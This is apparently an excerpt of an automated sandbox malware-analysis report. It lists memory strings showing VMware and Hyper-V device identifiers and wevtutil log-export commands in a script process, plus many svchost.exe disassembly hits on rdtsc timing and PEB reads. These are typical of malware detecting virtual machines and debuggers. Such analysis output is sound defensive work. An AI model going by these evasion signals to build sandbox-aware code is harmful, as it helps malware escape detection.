          Source: explorer.exe, 00000004.00000003.570659470.000000000929B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.571137211.000000000929B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.575365644.00000000092B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548887888.000000000929B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548525209.000000000929B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWfy
          Source: wscript.exe, 00000000.00000003.382882142.0000012C24B44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378800384.0000012C24B43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378433462.0000012C24B43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382422308.0000012C22C1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382601236.0000012C24D81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382275127.0000012C22C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382485422.0000012C24C81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd = "cmd /c wevtutil epl System /q:""*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]"" " & vmswitchlogFileName
          Source: wscript.exe, 00000000.00000003.378709397.0000012C249D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *$output += "(Get-VMNetworkAdapter -all)";
          Source: cmmon32.exe, 00000007.00000002.901229697.0000000000706000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000002.905466337.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000003.573784985.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000003.573784985.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000004.00000003.573784985.0000000008FE8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 00000004.00000003.573784985.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @%SystemRoot%\System32\mswsock.dll,-60202a0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir?
          Source: explorer.exe, 00000004.00000000.397125931.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: explorer.exe, 00000004.00000000.405024865.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.exe,-4000
          Source: cmmon32.exe, 00000007.00000002.901229697.00000000006C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx;q%SystemRoot%\system32\mswsock.dllQ
          Source: wscript.exe, 00000000.00000003.378709397.0000012C249D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" DSxxV
          Source: explorer.exe, 00000004.00000003.573784985.0000000008FE8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: wscript.exe, 00000000.00000003.378433462.0000012C24B43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: T$output += "(Get-VMNetworkAdapter -all)";
          Source: powershell.exe, 00000001.00000003.391772071.00000210A9F2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 00000004.00000003.548525209.000000000920F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.570659470.000000000920F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.910804188.000000000920F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00409AA0 rdtsc 3_2_00409AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A54BAD mov eax, dword ptr fs:[00000030h]3_2_03A54BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A54BAD mov eax, dword ptr fs:[00000030h]3_2_03A54BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A54BAD mov eax, dword ptr fs:[00000030h]3_2_03A54BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF5BA5 mov eax, dword ptr fs:[00000030h]3_2_03AF5BA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE138A mov eax, dword ptr fs:[00000030h]3_2_03AE138A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A31B8F mov eax, dword ptr fs:[00000030h]3_2_03A31B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A31B8F mov eax, dword ptr fs:[00000030h]3_2_03A31B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADD380 mov ecx, dword ptr fs:[00000030h]3_2_03ADD380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A52397 mov eax, dword ptr fs:[00000030h]3_2_03A52397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5B390 mov eax, dword ptr fs:[00000030h]3_2_03A5B390
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A503E2 mov eax, dword ptr fs:[00000030h]3_2_03A503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A503E2 mov eax, dword ptr fs:[00000030h]3_2_03A503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A503E2 mov eax, dword ptr fs:[00000030h]3_2_03A503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A503E2 mov eax, dword ptr fs:[00000030h]3_2_03A503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A503E2 mov eax, dword ptr fs:[00000030h]3_2_03A503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A503E2 mov eax, dword ptr fs:[00000030h]3_2_03A503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4DBE9 mov eax, dword ptr fs:[00000030h]3_2_03A4DBE9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA53CA mov eax, dword ptr fs:[00000030h]3_2_03AA53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA53CA mov eax, dword ptr fs:[00000030h]3_2_03AA53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE131B mov eax, dword ptr fs:[00000030h]3_2_03AE131B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2DB60 mov ecx, dword ptr fs:[00000030h]3_2_03A2DB60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A53B7A mov eax, dword ptr fs:[00000030h]3_2_03A53B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A53B7A mov eax, dword ptr fs:[00000030h]3_2_03A53B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2DB40 mov eax, dword ptr fs:[00000030h]3_2_03A2DB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF8B58 mov eax, dword ptr fs:[00000030h]3_2_03AF8B58
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2F358 mov eax, dword ptr fs:[00000030h]3_2_03A2F358
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A252A5 mov eax, dword ptr fs:[00000030h]3_2_03A252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A252A5 mov eax, dword ptr fs:[00000030h]3_2_03A252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A252A5 mov eax, dword ptr fs:[00000030h]3_2_03A252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A252A5 mov eax, dword ptr fs:[00000030h]3_2_03A252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A252A5 mov eax, dword ptr fs:[00000030h]3_2_03A252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3AAB0 mov eax, dword ptr fs:[00000030h]3_2_03A3AAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3AAB0 mov eax, dword ptr fs:[00000030h]3_2_03A3AAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5FAB0 mov eax, dword ptr fs:[00000030h]3_2_03A5FAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5D294 mov eax, dword ptr fs:[00000030h]3_2_03A5D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5D294 mov eax, dword ptr fs:[00000030h]3_2_03A5D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A52AE4 mov eax, dword ptr fs:[00000030h]3_2_03A52AE4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A52ACB mov eax, dword ptr fs:[00000030h]3_2_03A52ACB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A64A2C mov eax, dword ptr fs:[00000030h]3_2_03A64A2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A64A2C mov eax, dword ptr fs:[00000030h]3_2_03A64A2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4A229 mov eax, dword ptr fs:[00000030h]3_2_03A4A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4A229 mov eax, dword ptr fs:[00000030h]3_2_03A4A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4A229 mov eax, dword ptr fs:[00000030h]3_2_03A4A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4A229 mov eax, dword ptr fs:[00000030h]3_2_03A4A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4A229 mov eax, dword ptr fs:[00000030h]3_2_03A4A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4A229 mov eax, dword ptr fs:[00000030h]3_2_03A4A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4A229 mov eax, dword ptr fs:[00000030h]3_2_03A4A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4A229 mov eax, dword ptr fs:[00000030h]3_2_03A4A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4A229 mov eax, dword ptr fs:[00000030h]3_2_03A4A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A38A0A mov eax, dword ptr fs:[00000030h]3_2_03A38A0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A25210 mov eax, dword ptr fs:[00000030h]3_2_03A25210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A25210 mov ecx, dword ptr fs:[00000030h]3_2_03A25210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A25210 mov eax, dword ptr fs:[00000030h]3_2_03A25210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A25210 mov eax, dword ptr fs:[00000030h]3_2_03A25210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2AA16 mov eax, dword ptr fs:[00000030h]3_2_03A2AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2AA16 mov eax, dword ptr fs:[00000030h]3_2_03A2AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A43A1C mov eax, dword ptr fs:[00000030h]3_2_03A43A1C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEAA16 mov eax, dword ptr fs:[00000030h]3_2_03AEAA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEAA16 mov eax, dword ptr fs:[00000030h]3_2_03AEAA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADB260 mov eax, dword ptr fs:[00000030h]3_2_03ADB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADB260 mov eax, dword ptr fs:[00000030h]3_2_03ADB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF8A62 mov eax, dword ptr fs:[00000030h]3_2_03AF8A62
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6927A mov eax, dword ptr fs:[00000030h]3_2_03A6927A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A29240 mov eax, dword ptr fs:[00000030h]3_2_03A29240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A29240 mov eax, dword ptr fs:[00000030h]3_2_03A29240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A29240 mov eax, dword ptr fs:[00000030h]3_2_03A29240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A29240 mov eax, dword ptr fs:[00000030h]3_2_03A29240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEEA55 mov eax, dword ptr fs:[00000030h]3_2_03AEEA55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB4257 mov eax, dword ptr fs:[00000030h]3_2_03AB4257
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A561A0 mov eax, dword ptr fs:[00000030h]3_2_03A561A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A561A0 mov eax, dword ptr fs:[00000030h]3_2_03A561A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE49A4 mov eax, dword ptr fs:[00000030h]3_2_03AE49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE49A4 mov eax, dword ptr fs:[00000030h]3_2_03AE49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE49A4 mov eax, dword ptr fs:[00000030h]3_2_03AE49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE49A4 mov eax, dword ptr fs:[00000030h]3_2_03AE49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA69A6 mov eax, dword ptr fs:[00000030h]3_2_03AA69A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA51BE mov eax, dword ptr fs:[00000030h]3_2_03AA51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA51BE mov eax, dword ptr fs:[00000030h]3_2_03AA51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA51BE mov eax, dword ptr fs:[00000030h]3_2_03AA51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA51BE mov eax, dword ptr fs:[00000030h]3_2_03AA51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5A185 mov eax, dword ptr fs:[00000030h]3_2_03A5A185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4C182 mov eax, dword ptr fs:[00000030h]3_2_03A4C182
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A52990 mov eax, dword ptr fs:[00000030h]3_2_03A52990
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2B1E1 mov eax, dword ptr fs:[00000030h]3_2_03A2B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2B1E1 mov eax, dword ptr fs:[00000030h]3_2_03A2B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2B1E1 mov eax, dword ptr fs:[00000030h]3_2_03A2B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB41E8 mov eax, dword ptr fs:[00000030h]3_2_03AB41E8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A44120 mov eax, dword ptr fs:[00000030h]3_2_03A44120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A44120 mov eax, dword ptr fs:[00000030h]3_2_03A44120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A44120 mov eax, dword ptr fs:[00000030h]3_2_03A44120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A44120 mov eax, dword ptr fs:[00000030h]3_2_03A44120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A44120 mov ecx, dword ptr fs:[00000030h]3_2_03A44120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5513A mov eax, dword ptr fs:[00000030h]3_2_03A5513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5513A mov eax, dword ptr fs:[00000030h]3_2_03A5513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A29100 mov eax, dword ptr fs:[00000030h]3_2_03A29100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A29100 mov eax, dword ptr fs:[00000030h]3_2_03A29100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A29100 mov eax, dword ptr fs:[00000030h]3_2_03A29100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2C962 mov eax, dword ptr fs:[00000030h]3_2_03A2C962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2B171 mov eax, dword ptr fs:[00000030h]3_2_03A2B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2B171 mov eax, dword ptr fs:[00000030h]3_2_03A2B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4B944 mov eax, dword ptr fs:[00000030h]3_2_03A4B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4B944 mov eax, dword ptr fs:[00000030h]3_2_03A4B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A520A0 mov eax, dword ptr fs:[00000030h]3_2_03A520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A520A0 mov eax, dword ptr fs:[00000030h]3_2_03A520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A520A0 mov eax, dword ptr fs:[00000030h]3_2_03A520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A520A0 mov eax, dword ptr fs:[00000030h]3_2_03A520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A520A0 mov eax, dword ptr fs:[00000030h]3_2_03A520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A520A0 mov eax, dword ptr fs:[00000030h]3_2_03A520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A690AF mov eax, dword ptr fs:[00000030h]3_2_03A690AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5F0BF mov ecx, dword ptr fs:[00000030h]3_2_03A5F0BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5F0BF mov eax, dword ptr fs:[00000030h]3_2_03A5F0BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5F0BF mov eax, dword ptr fs:[00000030h]3_2_03A5F0BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A29080 mov eax, dword ptr fs:[00000030h]3_2_03A29080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA3884 mov eax, dword ptr fs:[00000030h]3_2_03AA3884
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA3884 mov eax, dword ptr fs:[00000030h]3_2_03AA3884
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A240E1 mov eax, dword ptr fs:[00000030h]3_2_03A240E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A240E1 mov eax, dword ptr fs:[00000030h]3_2_03A240E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A240E1 mov eax, dword ptr fs:[00000030h]3_2_03A240E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A258EC mov eax, dword ptr fs:[00000030h]3_2_03A258EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABB8D0 mov eax, dword ptr fs:[00000030h]3_2_03ABB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABB8D0 mov ecx, dword ptr fs:[00000030h]3_2_03ABB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABB8D0 mov eax, dword ptr fs:[00000030h]3_2_03ABB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABB8D0 mov eax, dword ptr fs:[00000030h]3_2_03ABB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABB8D0 mov eax, dword ptr fs:[00000030h]3_2_03ABB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABB8D0 mov eax, dword ptr fs:[00000030h]3_2_03ABB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5002D mov eax, dword ptr fs:[00000030h]3_2_03A5002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5002D mov eax, dword ptr fs:[00000030h]3_2_03A5002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5002D mov eax, dword ptr fs:[00000030h]3_2_03A5002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5002D mov eax, dword ptr fs:[00000030h]3_2_03A5002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5002D mov eax, dword ptr fs:[00000030h]3_2_03A5002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3B02A mov eax, dword ptr fs:[00000030h]3_2_03A3B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3B02A mov eax, dword ptr fs:[00000030h]3_2_03A3B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3B02A mov eax, dword ptr fs:[00000030h]3_2_03A3B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3B02A mov eax, dword ptr fs:[00000030h]3_2_03A3B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF4015 mov eax, dword ptr fs:[00000030h]3_2_03AF4015
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF4015 mov eax, dword ptr fs:[00000030h]3_2_03AF4015
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA7016 mov eax, dword ptr fs:[00000030h]3_2_03AA7016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA7016 mov eax, dword ptr fs:[00000030h]3_2_03AA7016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA7016 mov eax, dword ptr fs:[00000030h]3_2_03AA7016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF1074 mov eax, dword ptr fs:[00000030h]3_2_03AF1074
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE2073 mov eax, dword ptr fs:[00000030h]3_2_03AE2073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40050 mov eax, dword ptr fs:[00000030h]3_2_03A40050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40050 mov eax, dword ptr fs:[00000030h]3_2_03A40050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A38794 mov eax, dword ptr fs:[00000030h]3_2_03A38794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA7794 mov eax, dword ptr fs:[00000030h]3_2_03AA7794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA7794 mov eax, dword ptr fs:[00000030h]3_2_03AA7794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA7794 mov eax, dword ptr fs:[00000030h]3_2_03AA7794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A637F5 mov eax, dword ptr fs:[00000030h]3_2_03A637F5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A24F2E mov eax, dword ptr fs:[00000030h]3_2_03A24F2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A24F2E mov eax, dword ptr fs:[00000030h]3_2_03A24F2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E730 mov eax, dword ptr fs:[00000030h]3_2_03A5E730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF070D mov eax, dword ptr fs:[00000030h]3_2_03AF070D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF070D mov eax, dword ptr fs:[00000030h]3_2_03AF070D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5A70E mov eax, dword ptr fs:[00000030h]3_2_03A5A70E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5A70E mov eax, dword ptr fs:[00000030h]3_2_03A5A70E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4F716 mov eax, dword ptr fs:[00000030h]3_2_03A4F716
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABFF10 mov eax, dword ptr fs:[00000030h]3_2_03ABFF10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABFF10 mov eax, dword ptr fs:[00000030h]3_2_03ABFF10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3FF60 mov eax, dword ptr fs:[00000030h]3_2_03A3FF60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF8F6A mov eax, dword ptr fs:[00000030h]3_2_03AF8F6A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3EF40 mov eax, dword ptr fs:[00000030h]3_2_03A3EF40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF0EA5 mov eax, dword ptr fs:[00000030h]3_2_03AF0EA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF0EA5 mov eax, dword ptr fs:[00000030h]3_2_03AF0EA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF0EA5 mov eax, dword ptr fs:[00000030h]3_2_03AF0EA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA46A7 mov eax, dword ptr fs:[00000030h]3_2_03AA46A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABFE87 mov eax, dword ptr fs:[00000030h]3_2_03ABFE87
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A376E2 mov eax, dword ptr fs:[00000030h]3_2_03A376E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A516E0 mov ecx, dword ptr fs:[00000030h]3_2_03A516E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A68EC7 mov eax, dword ptr fs:[00000030h]3_2_03A68EC7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A536CC mov eax, dword ptr fs:[00000030h]3_2_03A536CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADFEC0 mov eax, dword ptr fs:[00000030h]3_2_03ADFEC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF8ED6 mov eax, dword ptr fs:[00000030h]3_2_03AF8ED6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2E620 mov eax, dword ptr fs:[00000030h]3_2_03A2E620
